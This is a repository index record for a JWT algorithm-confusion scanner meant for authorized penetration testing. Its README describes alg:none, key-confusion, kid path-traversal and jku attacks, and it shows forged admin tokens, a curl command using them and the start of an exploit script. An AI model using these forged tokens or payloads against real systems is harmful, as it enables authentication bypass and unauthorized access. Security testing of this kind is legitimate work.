{"id":26239556,"url":"https://github.com/geeknik/jwt-scanner","last_synced_at":"2025-06-23T11:37:11.663Z","repository":{"id":280023148,"uuid":"940772716","full_name":"geeknik/jwt-scanner","owner":"geeknik","description":"A tool for detecting JWT algorithm confusion vulnerabilities in web applications","archived":false,"fork":false,"pushed_at":"2025-05-13T21:01:39.000Z","size":102,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-19T00:56:40.605Z","etag":null,"topics":["bugbounty","confusion","infosec","jwt","scanner","security"],"latest_commit_sha":null,"homepage":"https://deepforkcyber.com/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/geeknik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-02-28T19:05:26.000Z","updated_at":"2025-05-13T21:01:42.000Z","dependencies_parsed_at":"2025-02-28T22:54:40.403Z","dependency_job_id":"dbd2e66b-5204-4075-bec1-b9869323f503","html_url":"https://github.com/geeknik/jwt-scanner","commit_stats":null,"previous_names":["geeknik/jwt-scanner"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/geeknik/jwt-scanner","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/geeknik%2Fjwt-scanner","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/geeknik%2Fjwt-scanner/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/geeknik%2Fjwt-scanner/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/geeknik%2Fjwt-scanner/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/geeknik","download_url":"https://codeload.github.com/geeknik/jwt-scanner/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/geeknik%2Fjwt-scanner/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261470055,"owners_count":23163211,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","confusion","infosec","jwt","scanner","security"],"created_at":"2025-03-13T07:02:23.253Z","updated_at":"2025-06-23T11:37:06.646Z","avatar_url":"https://github.com/geeknik.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# JWT Algorithm Confusion Scanner\n\nA specialized security tool for detecting JWT algorithm confusion vulnerabilities in web applications, allowing penetration testers to identify improper token validation techniques that can lead to authentication bypasses. **Features advanced verification and baseline comparison methods to minimize false positives.**\n\n## Overview\n\nJSON Web Tokens (JWTs) are commonly used for authentication and session management. When improperly implemented, they can be vulnerable to various attacks, particularly \"algorithm confusion\" where attackers manipulate the algorithm field to bypass signature verification.\n\nThis tool systematically tests targets for multiple JWT attack vectors:\n\n- \"alg:none\" attacks (acceptance of unsigned tokens)  \n- Algorithm switching without re-validation\n- Key confusion attacks (RS256 → HS256 with public key)\n- KID/JKU header parameter manipulation\n- Payload tampering with signature bypass\n\n## Installation\n\n```bash\n# Clone the repository\ngit clone https://github.com/geeknik/jwt-scanner.git\ncd jwt-scanner\n\n# Install dependencies\npip install -r requirements.txt\n```\n\n### Requirements\n\n- Python 3.6+\n- requests\n- colorama\n- urllib3\n\n## Usage\n\nBasic usage:\n\n```bash\npython jwt_scanner.py https://target.com\n```\n\nThe scanner will attempt to extract JWT tokens from the response. If unsuccessful, you can provide the token manually:\n\n```bash\npython jwt_scanner.py https://target.com -t \"eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...\"\n```\n\n### Advanced Usage with Verification\n\nTo reduce false positives, use the verification options:\n\n```bash\npython jwt_scanner.py https://target.com -t \"eyJhbG...\" --verify-endpoint \"https://target.com/admin/dashboard\" --success-strings \"Welcome,admin panel\" --failure-strings \"unauthorized,login required\"\n```\n\nThis tells the scanner to:\n\n1. Test the main URL for initial vulnerabilities\n2. Verify successful exploitation by testing the vulnerable token against the `/admin/dashboard` endpoint\n3. Look for specific strings that indicate success or failure\n\n## Proof of Concept Generation\n\nWhen the scanner identifies a vulnerability, it automatically generates proof of concept exploits:\n\n1. **Token comparison** - Shows the original vs. forged token details\n2. **Evidence** - Provides concrete differences between responses with legitimate vs. forged tokens\n3. **Curl command** - Ready-to-use command to verify the vulnerability\n4. **Python script** - Complete exploitation script for verification and demonstration\n\nExample output:\n\n```\n[+] PROOF OF CONCEPT EXPLOITS GENERATED:\n\n[+] POC #1: payload-manipulation - Added 'isAdmin:true' with alg:none attack\n\n[*] Token Comparison:\n[*] Original Token Header:\n{\n  \"alg\": \"RS256\",\n  \"typ\": \"JWT\"\n}\n[*] Original Token Payload:\n{\n  \"id\": \"client_2oABS7jzy1HEhgPl3AMSBV18sb4\",\n  \"rotating_token\": \"yrfv5y6zys4oo3eflnmm0h0i3cevpx4id3rk2ydd\"\n}\n[*] Attack Token Header:\n{\n  \"alg\": \"none\",\n  \"typ\": \"JWT\"\n}\n[*] Attack Token Payload:\n{\n  \"id\": \"client_2oABS7jzy1HEhgPl3AMSBV18sb4\",\n  \"rotating_token\": \"yrfv5y6zys4oo3eflnmm0h0i3cevpx4id3rk2ydd\",\n  \"isAdmin\": true\n}\n\n[*] Evidence of successful exploitation:\n    Endpoint: https://target.com/api/v1/admin\n    Original Response: Status 403, Length 157\n    Attack Response: Status 200, Length 1452\n    Differences detected in: Status codes, Content length, Response content\n\n    Original content sample:\n    {\"error\":\"Unauthorized\",\"message\":\"You do not have permission to access this resource\"}\n\n    Attack content sample:\n    {\"users\":[{\"id\":\"user_1\",\"name\":\"Admin User\",\"role\":\"admin\"},{\"id\":\"user_2\",\"name\":\"Regular User\",\"role\":\"user\"}]}\n\n[+] Verify with curl:\n    curl -s -k -X GET \"https://target.com/api/v1/admin\" -H \"Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6ImNsaWVudF8yb0FCUzdqenkxSEVoZ1BsM0FNU0JWMThzYjQiLCJyb3RhdGluZ190b2tlbiI6InlyZnY1eTZ6eXM0b28zZWZsbm1tMGgwaTNjZXZweDRpZDNyazJ5ZGQiLCJpc0FkbWluIjp0cnVlfQ.\" -i\n\n[+] Python POC Script:\n    Save the following to exploit-1.py and run with python3:\n    #!/usr/bin/env python3\n    import requests\n    from urllib3.exceptions import InsecureRequestWarning\n    import json\n    \n    # Disable SSL warnings\n    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n    \n    # Target information\n    target_url = \"https://target.com/api/v1/admin\"\n    attack_token = \"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6ImNsaWVudF8yb0FCUzdqenkxSEVoZ1BsM0FNU0JWMThzYjQiLCJyb3RhdGluZ190b2tlbiI6InlyZnY1eTZ6eXM0b28zZWZsbm1tMGgwaTNjZXZweDRpZDNyazJ5ZGQiLCJpc0FkbWluIjp0cnVlfQ.\"\n    ... (20 more lines)\n```\n\n### Options\n\n```\nusage: jwt_scanner.py [-h] [-t TOKEN] [-c COOKIE] [-a] [-k PUBLIC_KEY] [-p PAYLOAD] [-v] [-d DELAY] [--verify-endpoint ENDPOINT] [--success-strings STRINGS] [--failure-strings STRINGS] [--output FILE] [--verify-all] url\n\nJWT Algorithm Confusion Scanner\n\npositional arguments:\n  url                   Target URL to test\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -t, --token TOKEN     JWT token to test\n  -c, --cookie COOKIE   Name of the cookie containing the JWT\n  -a, --auth-header     Use Authorization header\n  -k, --public-key      Path to public key file\n  -p, --payload         Path to custom payload JSON file\n  -v, --verbose         Enable verbose output\n  -d, --delay DELAY     Delay between requests (seconds)\n  --verify-endpoint     Secondary URL to verify successful exploitation\n  --success-strings     Comma-separated list of strings indicating successful exploitation\n  --failure-strings     Comma-separated list of strings indicating failed exploitation\n  --output              Output file for scan results (JSON format)\n  --verify-all          Attempt to verify all potential vulnerabilities\n```\n\n## Features\n\n1. **Automatic token extraction** - Detects JWTs in cookies or authorization headers\n2. **Multiple attack vectors** - Tests common JWT flaws in a single run\n3. **Smart response analysis** - Uses baseline comparisons and confidence scoring to reduce false positives\n4. **Public key exploitation** - Tests for signature bypasses using public key confusion\n5. **Custom payload support** - Test with your own JWT manipulation techniques\n6. **Verification capabilities** - Confirms vulnerabilities using secondary endpoints and detailed response analysis\n7. **Confidence scoring** - Provides a confidence score for each potential vulnerability based on multiple indicators\n8. **Proof of Concept generation** - Automatically creates ready-to-use exploit scripts for verified vulnerabilities\n\n## Attack Techniques\n\n### Algorithm None Attack\n\nTests if the server accepts tokens with the `alg` value set to `none`, which eliminates signature verification.\n\n### Key Confusion\n\nTests if the server is vulnerable to using the wrong key type for validation. For example, when a token signed with RSA is switched to HMAC and validated using the public key as the HMAC secret.\n\n### Algorithm Substitution\n\nTests if the server accepts tokens where the algorithm has been changed without re-validating the signature.\n\n### KID Manipulation\n\nTests if the Key ID (`kid`) parameter can be manipulated to point to files on the server's filesystem or to exploit path traversal vulnerabilities.\n\n### JKU Manipulation\n\nTests if the JWK Set URL (`jku`) parameter can be manipulated to point to an attacker-controlled location for key retrieval.\n\n### Payload Manipulation\n\nTests if various privilege escalation payload modifications can be successful when combined with other attacks.\n\n## Understanding Results and Avoiding False Positives\n\nThe scanner uses a sophisticated system to determine if a target is vulnerable to JWT attacks. However, it's important to understand how to interpret the results:\n\n### Confidence Scores\n\nResults include a confidence score (0-100%) that indicates how likely a vulnerability is real:\n\n- **HIGH (70-100%)**: Strong evidence of vulnerability, especially if authentication verification is also high\n- **MEDIUM (50-69%)**: Potential vulnerability that requires manual verification\n- **LOW (0-49%)**: Likely not vulnerable or insufficient evidence\n\n### Authentication Verification\n\nThe scanner now includes authentication verification that tests if JWT tokens actually affect access to resources:\n\n- **High auth confidence (\u003e0.5)**: Token appears to control access to protected resources\n- **Low auth confidence (\u003c0.1)**: Site may be ignoring JWT tokens entirely\n\n### Warning Signs of False Positives\n\nBe cautious of potential false positives when you see these warnings:\n\n1. \"Valid and invalid baseline responses are very similar\" - Site may be ignoring tokens entirely\n2. \"Response very similar to previous attacks\" - Different attack types shouldn't produce identical responses\n3. \"Token does not appear to affect access to resources\" - Real JWT authentication should show differences\n\n### Contextual Success Indicators\n\nThe scanner now uses contextual analysis for success indicators, only counting words like \"success\" or \"profile\" when they appear in authentication-related contexts, not just anywhere on the page.\n\n### Verifying Results\n\nFor the most accurate results:\n\n1. Always use the `--verify-endpoint` option with a protected resource\n2. Provide custom `--success-strings` and `--failure-strings` specific to your target\n3. Manually verify any \"POTENTIAL VULNERABILITY\" findings\n4. Check the evidence in POC reports for clear differences between original and attack responses\n\n## Example Output\n\n```\n[+] Starting JWT Algorithm Confusion Scanner\n[*] Target URL: https://vulnerable-site.com\n[+] Found JWT in cookie: session\n[+] Successfully decoded JWT token\n\n[*] Establishing baseline responses...\n[*] Getting baseline for valid token...\n[*] Getting baseline for invalid token...\n[+] Baselines established:\n    Valid token: Status 200, Content Length: 8453\n    Invalid token: Status 401, Content Length: 1256\n\n[*] Testing for 'none' algorithm vulnerability...\n[*] Trying alg-none: Algorithm set to 'none' with empty signature\n[*] Verifying if token affects authentication...\n[*] Authentication verification confidence: 0.83\n[+] Token appears to affect access to resources\n[*] Evaluating response...\n[*] Response similarity - Valid: 0.85, Invalid: 0.25\n[+] Response is significantly more similar to valid token response\n[*] Adjusted confidence: 75% (auth factor: 1.00)\n[*] Verifying with secondary endpoint: https://vulnerable-site.com/admin/dashboard\n[*] Confidence: 92% (HIGH)\n[+] VERIFIED vulnerability found! Attack: alg-none\n[+] Vulnerable token: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.\n\n[*] Testing for key confusion vulnerability...\n[*] Trying key-confusion: Switched from RS256 to HS256 using public key as HMAC secret\n[*] Verifying if token affects authentication...\n[*] Authentication verification confidence: 0.67\n[+] Token appears to affect access to resources\n[*] Evaluating response...\n[*] Response similarity - Valid: 0.65, Invalid: 0.40\n[+] Response is somewhat similar to valid token response\n[*] Adjusted confidence: 45% (auth factor: 1.00)\n[+] POTENTIAL vulnerability found! Attack: key-confusion\n[+] Potentially vulnerable token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.a77Bn8Vxe7YRzOZ9Ao0j4J4pRwIwNql7Z5x98QPXIoc\n[!] Manual verification recommended\n\n...\n\n[!] Target is CONFIRMED VULNERABLE to JWT algorithm confusion attacks!\n[!] Found 1 verified vulnerabilities:\n  1. alg-none: Algorithm set to 'none' with empty signature (Confidence: 92%)\n[!] Found 2 potential vulnerabilities requiring manual verification:\n  1. key-confusion: Switched from RS256 to HS256 using public key as HMAC secret (Confidence: 45%)\n  2. kid-manipulation: Changed 'kid' parameter to: '../../../../../../../etc/passwd' (Confidence: 38%)\n```\n\n## Creating Custom Payloads\n\nYou can create a JSON file with custom payloads to test:\n\n```json\n[\n  {\n    \"header\": {\n      \"alg\": \"HS256\",\n      \"typ\": \"JWT\", \n      \"kid\": \"../../etc/passwd\"\n    },\n    \"payload\": {\n      \"sub\": \"1234567890\",\n      \"name\": \"John Doe\",\n      \"admin\": true\n    },\n    \"key\": \"your-test-key\"\n  }\n]\n```\n\n## Security Considerations\n\nThis tool is designed for security professionals with proper authorization to test applications. Unauthorized testing may violate laws and terms of service. Always:\n\n1. Obtain written permission before testing\n2. Respect rate limits and implement appropriate delays\n3. Report findings responsibly to the affected organizations\n\n## Reducing False Positives\n\nThe scanner uses several advanced techniques to minimize false positives:\n\n1. **Baseline Comparison**: Establishes how the application responds to valid and invalid tokens for comparison, with detection of sites that ignore tokens entirely\n2. **Authentication Verification**: Tests if tokens actually affect access to protected resources by comparing responses with and without tokens\n3. **Contextual Success Indicators**: Only counts success indicators when they appear in authentication-related contexts, not just anywhere on the page\n4. **Cross-Attack Response Comparison**: Detects when different attack types produce very similar responses, suggesting the site ignores tokens\n5. **Confidence Scoring**: Calculates a confidence percentage based on multiple indicators, with adjustments based on authentication verification\n6. **Secondary Verification**: Tests verified tokens against additional endpoints to confirm exploitation\n7. **Response Analysis**: Examines response content, headers, and status codes for both positive and negative indicators\n8. **Custom Success/Failure Indicators**: Allows specifying application-specific strings that indicate successful/failed exploitation\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## Contributing\n\nContributions are welcome! Please feel free to submit a Pull Request.\n\n1. Fork the repository\n2. Create your feature branch (`git checkout -b feature/amazing-feature`)\n3. Commit your changes (`git commit -m 'Add some amazing feature'`)\n4. Push to the branch (`git push origin feature/amazing-feature`)\n5. Open a Pull Request\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgeeknik%2Fjwt-scanner","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgeeknik%2Fjwt-scanner","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgeeknik%2Fjwt-scanner/lists"}